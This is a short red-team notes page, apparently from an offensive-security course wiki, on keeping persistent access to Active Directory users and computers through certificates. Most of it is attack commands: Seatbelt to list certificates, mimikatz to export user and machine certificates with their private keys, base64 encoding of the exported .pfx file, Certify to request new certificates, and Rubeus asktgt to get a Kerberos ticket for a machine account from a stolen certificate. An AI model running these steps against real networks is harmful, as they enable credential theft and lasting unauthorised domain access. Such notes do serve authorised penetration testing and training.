User & Computer Persistance

Certificates can also be useful for maintaining persistent access to both users and computers.

User Persistance

Seatbelt.exe Certificates

Always ensure the certificate is used for client authentication.

mimikatz crypto::certificates /export

download CURRENT_USER_My_0_Nina Lamb.pfx

cat /mnt/c/Users/Attacker/Desktop/CURRENT_USER_My_0_Nina\ Lamb.pfx | base64 -w 0

The export password will be mimikatz

If the user does not have a certificate in their store, we can just request one with Certify

mimikatz !crypto::certificates /systemstore:local_machine /export

\Rubeus.exe asktgt /user:WKSTN-1$ /enctype:aes256 /certificate:MIINCA[...]IH0A== /password:mimikatz /nowrap

/machine == auto elevate to SYSTEM

Last updated 2 years ago